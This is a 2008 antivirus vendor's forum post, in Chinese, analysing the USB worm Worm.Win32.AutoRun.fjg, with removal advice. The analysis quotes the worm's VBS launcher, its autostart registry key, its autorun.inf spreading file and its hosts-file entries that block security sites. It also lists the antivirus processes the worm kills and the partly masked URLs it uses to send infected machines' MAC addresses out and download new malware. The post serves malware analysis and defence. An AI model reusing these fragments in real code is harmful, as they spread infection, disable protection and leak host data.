»
游客:
注册
|
登录
|
帮助
微点交流论坛
»
病毒快报
» U盘蠕虫Worm.Win32.AutoRun.fjg
作者:
标题: U盘蠕虫Worm.Win32.AutoRun.fjg
pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
#1
U盘蠕虫Worm.Win32.AutoRun.fjg
Worm.Win32.AutoRun.fjg
捕获时间
2008-08-26
病毒摘要
该样本是使用“Delphi”编写的“蠕虫程序”,由微点主动防御软件自动捕获,采用加壳方式试图躲避特征码扫描,加壳后长度为“14,863 字节”,图标为
,使用“exe”扩展名,通过“网页木马”、“移动存储介质”等方式植入用户计算机进行传播,破坏安全模式、下载其他木马程序到本地执行。
感染对象
Windows 2000/Windows XP/Windows 2003
传播途径
网页木马、文件捆绑、移动存储介质
安全提示
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"Worm.Win32.AutoRun.fjg”,请直接选择删除(如图2)。
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、建议关闭U盘自动播放,具体操作步骤:开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"已启用"。
3、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
4、开启windows自动更新,及时打好漏洞补丁。
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
2008-8-26 13:56
pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
#2
病毒分析
该样本程序被执行后,拷贝自身到目录%systemroot%\Tasks\下并重命名为“kav32.exe”,使用批处理启动自身;在同一目录下释放文件“pig.vbs”,动态库文件“wsock32.dll”以及病毒副本“注册.bat”,“pig.vbs”的内容如下:
Quote:
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%windir%\Tasks\kav32.exe",0
修改如下注册表健值使得开机自启动,使用批处理执行自删除。
Quote:
项:
HKLM\SOFTWARE\Microsoft\ActiveSetup\InstalledComponents\{H8I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}\
键值:stubpath
指向数据:%windir%\Tasks\pig.vbs
病毒程序“kav32.exe”运行后,执行以下动作:
遍历进程查找如下进程并将其结束
Quote:
360tray.exe
Iparmor.exe
WEBSCANX.EXE
TBSCAN.EXE
TrojanHunter.exe
THGUARD.EXE
FWMon.exe
mmsk.exe
vptray.exe
ast.exe
AST.exe
PFW.exe
查找窗口名或类名为如下字符的窗口,通过向其发送相关消息使其关闭。
Quote:
杀毒
Worm
卡巴斯基
超级巡警
江民
离线升级包
金山
Anti
Anti
Virus
virus
Firewall
检测
防火墙
主动防御
微点
瑞星
狙剑
上报
系统安全
绿鹰
安全卫士
举报
删除相关注册表项破坏安全模式,搜集被感染主机的mac地址,并把被感染主机的mac地址和感染的病毒版本发送至“
http://www.huamao
***dian.com/vb/dowm/www.asp”。
访问“
http://www.huamao
***dian.com/vb/dowm/ser.txt”查询当前病毒版本是否为最新,如果不是则访问“
http://www.huamao
***dian.com/vb/dowm/me.exe”下载最新版病毒程序至“c:\_default.pif”。通过查找%ProgramFiles%获得“winrar”安装路径,遍历所有分区下的 “.rar”, “.zip”文件,找到后在后台调用“winrar”程序,执行命令“\RAR.exe a -ep -u –inul”把病毒副本“注册.bat”压缩进压缩包,诱使用户点击。
接着查找hosts文,写入如下数据,屏蔽多数安全网站:
Quote:
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1
http://www.qihoo.com/
127.0.0.1
http://www.qihoo.cn/
127.0.0.1 124.40.51.17
127.0.0.1 58.17.236.92
127.0.0.1
http://www.kaspersky.com/
127.0.0.1 60.210.176.251
127.0.0.1
http://www.cnnod32.cn/
127.0.0.1
http://www.lanniao.org/
127.0.0.1
http://www.nod32club.com/
127.0.0.1
http://www.dswlab.com/
127.0.0.1 bbs.sucop.com
127.0.0.1
http://www.virustotal.com/
127.0.0.1 tool.ikaka.com
127.0.0.1
http://www.jiangmin.com/
127.0.0.1
http://www.duba.net/
127.0.0.1
http://www.eset.com.cn/
127.0.0.1
http://www.nod32.com/
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1
http://www.kaspersky.com.cn/
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1
http://www.360.cn/
127.0.0.1
http://www.360safe.cn/
127.0.0.1
http://www.360safe.com/
127.0.0.1
http://www.chinakv.com/
127.0.0.1
http://www.rising.com.cn/
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
修改如下注册表键值隐藏病毒文件不能够显示:
Quote:
项:HKCU\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\Explorer\Advanced\
键值:ShowSuperHidden
指向数据:00
项:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
键值:CheckedValue: 00eb0001
检测可移动存储中是否有“autorun.inf”文件,如果有将其改名之后向里面写入“autorun.inf”,创建回收站“recycle.{645FF040-5081-101B-9F08-00AA002F954E}”文件夹使内文件实际不可见,在该文件夹内写入kav32.exe与autorun.inf,其中autorun.inf文件内容如下, 试图使用Windows自动播放功能来传播病毒。
Quote:
[AutoRun]
open=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
shell\open=打开(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
遍历所有文件夹并且将%systemroot%\Tasks\wsock32.dll 复制到每个文件夹下
当该文件夹下的可执行文件的导入表含有“wsock32.dll”的时候,会首先调用同文件夹下的“wsock32.dll”,使程序打开失败,连接互联网下载其他病毒程序到本地执行。
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
2008-8-26 13:59
论坛跳转:
微点软件公测区
安全快报
> 病毒快报
> 漏洞快报
微点产品在线技术支持
> 微点主动防御软件
> 预升级反馈专区
> 微点杀毒软件
微点用户交流区
> 微点新闻
> 微点软件使用交流
> 微点茶室
安全技术交流区
> 主动防御
> 反病毒
> 防火墙
综合区
> 电脑&数码
> 体育&娱乐&休闲
> 灌水区
版务管理
内部使用专区
可打印版本
|
推荐
|
订阅
|
收藏
[
联系我们
-
东方微点
]
北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司
闽ICP备05030815号